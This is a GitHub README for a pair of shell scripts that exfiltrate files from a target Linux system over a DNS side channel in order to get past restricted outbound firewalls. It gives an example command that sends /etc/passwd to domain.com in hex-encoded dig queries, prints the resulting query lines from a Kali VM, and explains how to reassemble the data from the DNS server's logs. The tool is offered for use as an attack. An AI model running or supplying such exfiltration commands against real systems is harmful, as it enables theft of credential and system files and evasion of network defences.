-
Notifications
You must be signed in to change notification settings - Fork 0
/
README
26 lines (20 loc) · 1.59 KB
/
README
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
Lightweight Linux shell script to exfiltrate data from a target system via DNS side channel. Useful when outbound traffic is restricted via firewall.
Uses command line arguments Target File, Unique Identifier (used to differentiate between multiple exports), Domain Name
Example usage: ./dns_export.sh /etc/passwd ID1 domain.com
Chunks target file via hexdump utility and exports each piece of the file via a dig request to the domain specified.
Example results:
[09.25.2016]db@Kali-VM1:Exploits$./dns_export.sh /etc/passwd ID1 domain.com
726f6f743a783a303a303a726f6f743a2f726f6f743a2f62696e2f626173.0.ID1.domain.com
680a6461656d6f6e3a783a313a313a6461656d6f6e3a2f7573722f736269.1.ID1.domain.com
6e3a2f7573722f7362696e2f6e6f6c6f67696e0a62696e3a783a323a323a.2.ID1.domain.com
62696e3a2f62696e3a2f7573722f7362696e2f6e6f6c6f67696e0a737973.3.ID1.domain.com
3a783a333a333a7379733a2f6465763a2f7573722f7362696e2f6e6f6c6f.4.ID1.domain.com
67696e0a73796e633a783a343a36353533343a73796e633a2f62696e3a2f.5.ID1.domain.com
62696e2f73796e630a67616d65733a783a353a36303a67616d65733a2f75.6.ID1.domain.com
73722f67616d65733a2f7573722f7362696e2f6e6f6c6f67696e0a6d616e.7.ID1.domain.com
3a783a363a31323a6d616e3a2f7661722f63616368652f6d616e3a2f7573.8.ID1.domain.com
722f7362696e2f6e6f6c6f67696e0a6c703a783a373a373a6c703a2f7661.9.ID1.domain.com
722f73706f6f6c2f6c70643a2f7573722f7362696e2f6e6f6c6f67696e0a.10.ID1.domain.com
To reassembly data exfiltrated via DNS queries, run dns_reassembly.sh on the DNS server log file.
Uses command line arguments Input File, Unique Identifier from dns_export.sh
Example usage: ./dns_reassembly /var/log/syslog ID1